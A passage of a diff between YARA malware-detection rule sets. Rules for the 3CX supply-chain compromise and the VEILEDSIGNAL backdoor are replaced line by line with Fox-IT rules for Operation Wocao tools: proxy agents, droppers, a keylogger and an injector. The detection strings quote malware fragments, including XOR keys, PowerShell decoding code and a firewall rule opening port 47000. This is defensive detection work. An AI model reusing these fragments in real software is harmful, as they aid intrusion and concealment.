-		hash2 = "ac99602999bf9823f221372378f95baa4fc68929bac3a10e8d9a107ec8074eca"
-		hash3 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
+		tags = ""
 
 	strings:
-		$s1 = "20230313064152Z0"
-		$s2 = "Developer ID Application: 3CX (33CF4654HL)"
+		$a = "mysend(client_sock, new byte[] { 0x16, 0x00 }, 2);" ascii wide
+		$b = "Dns.GetHostAddresses(sip.Remove(sip.Length - 1));" ascii wide
+		$c = "Port = 256 * buf[4] + buf[5];" ascii wide
+		$d = "Port = 256 * buf[AddrLen] + buf[AddrLen + 1];" ascii wide
+		$e = "StartTransData(CliSock" ascii wide
+		$f = "static void ForwardTransmit(object ft_data)" ascii wide
+		$key = "0x4c, 0x1b, 0x68, 0x0b, 0x6a, 0x18, 0x09, 0x41, 0x5a, 0x36, 0x1f, 0x56, 0x26, 0x2a, 0x03, 0x44, 0x7d, 0x5f, 0x03, 0x7b, 0x07, 0x6e, 0x03, 0x77, 0x30, 0x70, 0x52, 0x42, 0x53, 0x67, 0x0a, 0x2a" ascii wide
+		$key_raw = { 4c1b680b6a1809415a361f56262a03447d5f037b076e03773070524253670a2a }
 
 	condition:
-		( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_Macos_NK_3CX_DYLIB_Mar23_1
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_Dropper
 {
 	meta:
-		description = "Detects malicious DYLIB files related to 3CX compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a19904d3-9b2d-561f-b734-20bf09584fa7"
-		date = "2023-03-30"
+		description = "Strings from PowerShell dropper of CSharp version of Agent"
+		author = "Fox-IT SRT"
+		id = "833ce607-56a9-5580-bbd1-e72392945fec"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L24-L38"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e52c76de1e995cc7084ddb390b60f4bc66e5bdf89aaa28ef3fd70578ed3145a6"
-		score = 80
+		logic_hash = "19f56e69685ae8c13b9dd884f8322915835c16e2c6313f01f9fa447218419108"
+		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
-		hash2 = "fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7"
 
 	strings:
-		$xc1 = { 37 15 00 13 16 16 1B 55 4F 54 4A 5A 52 2D 13 14
-               1E 15 0D 09 5A 34 2E 5A 4B 4A 54 4A 41 5A 2D 13
-               14 4C 4E 41 5A 02 4C 4E 53 5A 3B 0A 0A 16 1F 2D
-               1F 18 31 13 0E 55 4F 49 4D 54 49 4C 5A 52 31 32
-               2E 37 36 56 5A 16 13 11 1F 5A 3D 1F 19 11 15 53
-               5A 39 12 08 15 17 1F 55 4B 4A 42 54 4A 54 4F 49
-               4F 43 54 4B 48 42 5A 29 1B 1C 1B 08 13 55 4F 49
-               4D 54 49 4C 7A }
-		$xc2 = { 41 49 19 02 25 1b 0f 0e 12 25 0e 15 11 1f 14 25 19 15 14 0e 1f 14 0e 47 5f 09 41 25 25 0e 0f 0e 17 1b 47 }
-		$xc3 = { 55 29 03 09 0e 1f 17 55 36 13 18 08 1b 08 03 55 39 15 08 1f 29 1f 08 0c 13 19 1f 09 55 29 03 09 0e 1f 17 2c 1f 08 09 13 15 14 54 0a 16 13 09 0e }
+		$a = "function format([string]$source)"
+		$b = "foreach($c in $bb){$tt = $tt + [char]($c -bxor"
+		$c = "[agent]::Main($args);"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_APT_SUSP_NK_3CX_Malicious_Samples_Mar23_1
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Powershell_B64Encoded
 {
 	meta:
-		description = "Detects indicator (event name) found in samples related to 3CX compromise"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b233846a-19df-579b-a674-233d66824008"
-		date = "2023-03-30"
+		description = "Piece of Base64 encoded data from Agent CSharp version"
+		author = "Fox-IT SRT"
+		id = "14e1702d-6229-5989-8bb7-cc9c0c321676"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L216-L232"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L40-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6ab8a4ac184eaba6eb56bfc49d6fa03f9b0877d75294aa9a242e9ac96482fab0"
-		score = 70
+		logic_hash = "bcf9a75dbbf90044db76c56ffd07971d4252b0e75d73abf402ca4fadbfb59767"
+		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "7986bbaee8940da11ce089383521ab420c443ab7b15ed42aed91fd31ce833896"
-		hash2 = "59e1edf4d82fae4978e97512b0331b7eb21dd4b838b850ba46794d9c7a2c0983"
-		hash3 = "aa124a4b4df12b34e74ee7f6c683b2ebec4ce9a8edcf9be345823b4fdcf5d868"
-		hash4 = "c485674ee63ec8d4e8fde9800788175a8b02d3f9416d0e763360fff7f8eb4e02"
 
 	strings:
-		$a1 = "AVMonitorRefreshEvent" wide fullword
+		$header = "LFNVT0hBBnVfVVJDSx0sU1VPSEEGdV9VUkNLCG9pHSxTVU9IQQZ1X1VSQ0sIZUlK"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Malicious_Samples_Mar23_4
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py
 {
 	meta:
-		description = "Detects decrypted payload loaded inside 3CXDesktopApp.exe which downloads info stealer"
-		author = "MalGamy (Nextron Systems)"
-		id = "d11170df-570c-510c-80ec-39048acd0fbd"
-		date = "2023-03-29"
+		description = "Strings from Python version of Agent"
+		author = "Fox-IT SRT"
+		id = "ca30dd6a-b596-54ab-b4f0-50e6b1382f73"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/WhichbufferArda/status/1641404343323688964?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L234-L249"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L54-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "851c2c99ebafd4e5e9e140cfe3f2d03533846ca16f8151ae8ee0e83c692884b7"
-		logic_hash = "2fd56527a094b1f155cf33af402328835d4fb8aee9a058742d3e3763acef9e46"
-		score = 80
-		quality = 85
+		logic_hash = "9b6eba750c96501aae1d86eef458d3e80de665efc7ce9d5aff842bc44363bad2"
+		score = 75
+		quality = 60
 		tags = ""
 
 	strings:
-		$op1 = {41 69 D0 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 81 C2 [4] 33 C1 43 8D 0C 02 02 C8 49 C1 EA ?? 41 88 0B 8B C8 C1 E1 ?? 33 C1 44 69 C2 [4] 8B C8 C1 E9 ?? 33 C1 8B C8 C1 E1 ?? 41 81 C0 [4] 33 C1 4C 0F AF CF 4D 03 CA 45 8B D1 4C 0F AF D7 41 8D 0C 11 49 C1 E9 ?? 02 C8}
-		$op2 = {4D 0F AF CC 44 69 C2 [4] 4C 03 C9 45 8B D1 4D 0F AF D4 41 8D 0C 11 41 81 C0 [4] 02 C8 49 C1 E9 ?? 41 88 4B ?? 4D 03 D1 8B C8 45 8B CA C1 E1 ?? 33 C1}
-		$op3 = {33 C1 4C 0F AF C7 8B C8 C1 E1 ?? 4D 03 C2 33 C1}
+		$a = "vpshex.decode"
+		$b = "self._newsock.recv"
+		$c = "Rsock.connect"
+		$d = /MAX_DATALEN\s?=\s?10240/
+		$e = /LISTEN_MAXCOUNT\s?=\s?80/
+		$f = "ListenSock.listen(LISTEN_MAXCOUNT)"
+		$g = "nextsock.send(head)"
+		$h = "elif transnode"
+		$i = "infobuf[4:6]"
+		$key = "L\\x1bh\\x0bj\\x18\\tAZ6\\x1fV&*\\x03D}_\\x03{\\x07n\\x03w0pRBSg\\n*"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Backdoor_Mar23 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Agent_Py_B64Encoded
 {
 	meta:
-		description = "Detects 3CXDesktopApp MacOS Backdoor component"
-		author = "X__Junior (Nextron Systems)"
-		id = "80046c8e-0c2a-5885-b140-a6084f48160d"
-		date = "2023-03-30"
+		description = "Piece of Base64 encoded data from Agent Python version"
+		author = "Fox-IT SRT"
+		id = "eb2701e9-4358-5d24-bfcd-b4dde24f13bf"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L77-L89"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67"
-		logic_hash = "777a0a29c376f3697021dd627e716c31bda7933c5f40a8fe79b80e3cea46ce43"
-		score = 80
+		logic_hash = "279fb27637d9b62b484283f778215d042de9fb83110a233e048452e921c540ee"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$sa1 = "%s/.main_storage" ascii fullword
-		$sa2 = "%s/UpdateAgent" ascii fullword
-		$op1 = { 31 C0 41 80 34 06 ?? 48 FF C0 48 83 F8 ?? 75 ?? BE ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 F7 48 89 D9 E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 F7 5B 41 5E 41 5F E9 ?? ?? ?? ?? 5B 41 5E 41 5F C3}
-		$op2 = { 0F 11 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 0F 28 05 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 31 C0 80 B4 04 ?? ?? ?? ?? ?? 48 FF C0}
+		$header = "QlpoOTFBWSZTWWDdHjgABDTfgHwQe////z/v/9+////6YA4cGPsAl2e8M9LSU128"
 
 	condition:
-		(( uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and filesize < 6MB and ( ( 1 of ( $sa* ) and 1 of ( $op* ) ) or all of ( $sa* ) ) ) or ( all of ( $op* ) )
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_ICONIC_Stealer_Mar23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_Py
 {
 	meta:
-		description = "Detects ICONIC stealer payload used in the 3CX incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e92b5b90-1146-5235-9711-a4d42689c49b"
-		date = "2023-03-31"
+		description = "Strings from Python keylogger"
+		author = "Fox-IT SRT"
+		id = "f7b5ec1b-669e-5e7d-a9d3-011d212eb363"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://github.com/volexity/threat-intel/blob/main/2023/2023-03-30%203CX/attachments/iconicstealer.7z"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L279-L304"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L91-L107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1f57a2af4a5b9e71e2b72ddc3839400731d9d37eb4349c393b37b3f86c0c7f73"
-		score = 80
+		logic_hash = "2dc2ce153d559d795f302f5ca4a9ef9e6e5c54762472e38e6f4a26ef8a28a184"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "8ab3a5eaaf8c296080fadf56b265194681d7da5da7c02562953a4cb60e147423"
+		tags = ""
 
 	strings:
-		$s1 = "{\"HostName\": \"%s\", \"DomainName\": \"%s\", \"OsVersion\": \"%d.%d.%d\"}" wide fullword
-		$s2 = "******************************** %s ******************************" wide fullword
-		$s3 = "AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data" wide fullword
-		$s4 = "AppData\\Roaming\\Mozilla\\Firefox\\Profiles" wide fullword
-		$s5 = "SELECT url, title FROM urls ORDER BY id DESC LIMIT 500" wide fullword
-		$s6 = "TEXT value in %s.%s" ascii fullword
-		$op1 = { 48 63 d1 48 63 ce 49 03 d1 49 03 cd 4c 63 c7 e8 87 1f 09 00 8b 45 d0 44 8d 04 37 }
-		$op2 = { 48 8b c8 8b 56 f0 48 89 46 d8 e8 78 8f f8 ff e9 ec 13 00 00 c7 46 20 ff ff ff ff e9 e0 13 00 00 33 ff }
+		$a = "c:\\windows\\temp\\tap.tmp"
+		$b = "c:\\windows\\temp\\mrteeh.tmp"
+		$c = "GenFileName"
+		$d = "outfile"
+		$e = "[PASTE:%d]"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4000KB and 4 of them or 6 of them
+		3 of them
 }
-rule SIGNATURE_BASE_APT_MAL_NK_3CX_Macos_Elextron_App_Mar23_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Keylogger_File
 {
 	meta:
-		description = "Detects macOS malware used in the 3CX incident"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7a3755d4-37e5-5d3b-93aa-34edb557f2d5"
-		date = "2023-03-31"
+		description = "Rule for finding keylogger output files"
+		author = "Fox-IT SRT"
+		id = "22e866b3-4b02-593a-b9a6-aa86870b6509"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L306-L328"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L109-L121"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "00dd28c3edd94e04e35ee9e3a43c30b5a0a1ad21ec8ecf2099bbeb9de2fca8d0"
-		score = 80
+		logic_hash = "6d2d677b69eaf31843e8352bfe040c9e5a8d423d17900e022b769d28789f2d98"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "51079c7e549cbad25429ff98b6d6ca02dc9234e466dd9b75a5e05b9d7b95af72"
-		hash2 = "f7ba7f9bf608128894196cf7314f68b78d2a6df10718c8e0cd64dbe3b86bc730"
+		tags = ""
 
 	strings:
-		$a1 = "com.apple.security.cs.allow-unsigned-executable-memory" ascii
-		$a2 = "com.electron.3cx-desktop-app" ascii fullword
-		$s1 = "s8T/RXMlALbXfowom9qk15FgtdI=" ascii
-		$s2 = "o8NQKPJE6voVZUIGtXihq7lp0cY=" ascii
+		$a = { 0d 0a 20 [3-10] 53 74 61 72 74 75 70 3a 20 [3] 20 [3] 20 [2] 20 [2] 3a [2] 3a [2] 20 }
 
 	condition:
-		uint16( 0 ) == 0xfacf and filesize < 400KB and ( all of ( $a* ) and 1 of ( $s* ) )
+		all of them
 }
-rule SIGNATURE_BASE_MAL_3Cxdesktopapp_Macos_Updateagent_Mar23 : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Csharp
 {
 	meta:
-		description = "Detects 3CXDesktopApp MacOS UpdateAgent backdoor component"
-		author = "Florian Roth (Nextron Systems)"
-		id = "596eb6d0-f96f-5106-ae67-9372d238e4cf"
-		date = "2023-03-30"
+		description = "Strings from the CSharp version of XServer"
+		author = "Fox-IT SRT"
+		id = "48f4c88d-fb56-54ca-84e2-38f88804a50f"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/patrickwardle/status/1641692164303515653?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L330-L354"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L123-L141"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9e9a5f8d86356796162cee881c843cde9eaedfb3"
-		logic_hash = "0818a8f0b59a9baaefaa0b505f8261e0e0df283e79da8e95dc71e9afdca224ab"
-		score = 80
+		logic_hash = "1201ee45df78cf3aec4b4bbb59cb7e4a70af6928895bb7c968ef02075a963405"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$a1 = "/3CX Desktop App/.main_storage" ascii
-		$x1 = ";3cx_auth_token_content=%s;__tutma=true"
-		$s1 = "\"url\": \"https://"
-		$s3 = "/dev/null"
-		$s4 = "\"AccountName\": \""
+		$a = "static void ServerX(int ListenPort)" ascii wide
+		$b = "public class xserver" ascii wide
+		$c = "[xserver]::Main($args);" ascii wide
+		$d = "add rule name=powershell dir=in localport=47000 action=allow" ascii wide
+		$e = "string TempFile = file_path + \".CT\";" ascii wide
+		$f = "Port = 256 * RecvBuf[AddrLen + 5] + RecvBuf[AddrLen + 6];"
+		$g = "CliSock.Send(new byte[] { 0x05, 0x00 });"
 
 	condition:
-		uint16( 0 ) == 0xfeca and filesize < 6MB and ( 1 of ( $x* ) or ( $a1 and all of ( $s* ) ) ) or all of them
+		1 of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_2
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_B64Encoded
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "ff1fa0bd-19b7-553a-9506-bc5aa5d29056"
-		date = "2023-04-29"
+		description = "Piece of Base64 encoded data from the XServer PowerShell dropper"
+		author = "Fox-IT SRT"
+		id = "01e38cfb-b245-5398-b037-6d1d2fb726ee"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L373-L392"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L143-L155"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c4887a5cd6d98e273ba6e9ea3c1d8f770ef26239819ea24a1bfebd81d6870505"
-		logic_hash = "a15f7f06be5e620baf33d595afc35246dae0307978984af832940a74ef2c84eb"
-		score = 80
+		logic_hash = "77315f0fc8387fa87892fc8fcea1f6e8a95560049aaa9a87519859020d0a7a3e"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$sa1 = "\\.\\pipe\\gecko.nativeMessaging" ascii
-		$sa2 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40" ascii
-		$sa3 = "application/json, text/javascript, */*; q=0.01" ascii
-		$op1 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
-		$op2 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
-		$op3 = { 48 89 74 24 ?? 45 33 C0 89 74 24 ?? 41 B9 ?? ?? ?? ?? 89 74 24 ?? 48 8B D8 48 C7 00 ?? ?? ?? ?? 48 8B 0F 41 8D 50 ?? 48 89 44 24 ?? 89 74 24 ?? FF 15}
+		$header_47000 = "5T39c9u2kr/nr2A0Ny2VKIzkfLRJntuJHafPN/nwWG777rUZDy3BNq8UqSEpx26b"
+		$header_25667 = "5T1rc9u2st/zKxjNmZZKFEZyErdJ6nZsx+nxnTjxWGp77mkzHlqCbd5SpIak/Gjr"
 
 	condition:
-		all of ( $op* ) or all of ( $sa* )
+		any of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_3
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Xserver_Powershell_Dropper
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "6b6f984e-242a-5b84-baa9-6311992cde9b"
-		date = "2023-04-29"
+		description = "Strings from the PowerShell dropper of XServer"
+		author = "Fox-IT SRT"
+		id = "97169ab4-d68d-5137-83de-d9cac975747e"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L394-L410"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L157-L168"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "595392959b609caf088d027a23443cf2fefd043607ccdec3de19ad3bb43a74b1"
-		logic_hash = "58f860926db4a7dfefbd39ee35efaa0081b7e31a361efce02f5144266ab652a6"
-		score = 80
+		logic_hash = "640c9e52f3cf3df4e954177624e6fba4bab80a2c9442b718fe90e8577dafbbd6"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$op1 = { 4C 8B CB 4C 89 74 24 ?? 4C 8D 05 ?? ?? ?? ?? 44 89 74 24 ?? 33 D2 33 C9 FF 15}
-		$op2 = { 89 7? 24 ?? 44 8B CD 4C 8B C? 48 89 44 24 ?? 33 D2 33 C9 FF 15}
-		$op3 = { 8B 54 24 ?? 4C 8D 4C 24 ?? 45 8D 46 ?? 44 89 74 24 ?? 48 8B CB FF 15}
-		$op4 = { 48 8D 44 24 ?? 45 33 C9 41 B8 01 00 00 40 48 89 44 24 ?? 41 8B D5 48 8B CF FF 15}
+		$encfile = "New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($encfile)"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23_4
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Injector_Bin
 {
 	meta:
-		description = "Detects malicious VEILEDSIGNAL backdoor"
-		author = "X__Junior"
-		id = "77340ec0-36bb-5c47-995f-4e6f76b68fe1"
-		date = "2023-04-29"
+		description = "Process injector/launcher"
+		author = "Fox-IT SRT"
+		id = "389279f1-6531-594f-97b6-5adbc8fa4d3d"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L412-L428"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L170-L193"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9b0761f81afb102bb784b398b16faa965594e469a7fcfdfd553ced19cc17e70b"
-		logic_hash = "ad22df404d948073428fc35b0c8fbfea25da3bc66e46ea6397ff751ae65d5939"
-		score = 80
+		logic_hash = "c8cd4e3c87c6d80b39069f7a94e512e3f7b739c21f6fd70c2a79829c5a04f32f"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$op1 = { 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 }
-		$op2 = { 48 8B C8 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 45 33 C0 4C 8D 4D ?? B2 01 41 8D 48 ?? FF D0}
-		$op3 = { 33 FF C7 44 24 ?? 38 02 00 00 33 D2 8D 4F ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 FF 74 ?? 48 8D 54 24 ?? 48 8B C8 FF 15 }
-		$op4 = { 4C 8D 05 ?? ?? ?? ?? 48 89 4C 24 ?? 4C 8B C8 33 D2 89 4C 24 ?? FF 15 }
+		$a = "%s{%04d-%02d%02d-%02d%02d-%d%ld}.tmp"
+		$b = "s% > s% c/ exe.d"
+		$c = {
+            48 89 5C 24 08 48 89 74  24 10 57 48 83 EC 50 48
+            8B 71 08 48 8D 59 10 48  8B F9 48 8B CB FF 17 33
+            C9 48 8D 47 78 48 89 44  24 48 4C 8D 87 9C 03 00
+            00 48 89 5C 24 40 48 8D  97 90 00 00 00 4C 89 44
+            24 38 45 33 C9 48 89 4C  24 30 45 33 C0 89 4C 24
+            28 C7 44 24 20 01 00 00  00 66 89 4B 40 FF D6 48
+            8B 5C 24 60 33 C0 48 8B  74 24 68 48 83 C4 50 5F
+            C3
+        }
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Office_OLE_DDE : FILE
+rule SIGNATURE_BASE_APT_MAL_CN_Wocao_Timeliner_Bin
 {
 	meta:
-		description = "Detects DDE in MS Office documents"
-		author = "NVISO Labs"
-		id = "2ead3cc9-f517-5916-93c9-1393362aa45d"
-		date = "2017-10-12"
+		description = "Timeliner utility"
+		author = "Fox-IT SRT"
+		id = "3d81a4ae-0ce0-5867-ac93-a706556481b6"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_dde_in_office_docs.yar#L48-L63"
+		reference = "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_wocao.yar#L195-L213"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d2f7dce166dc8ef8aba7e8eaafaf4d1bb34cdc1ce97d34125a65147cf5e08ac"
-		score = 50
-		quality = 60
-		tags = "FILE"
+		logic_hash = "c3a8cddc34134faaab93ee0df0086604e4a7b031530dd65e2e8dab705483305b"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
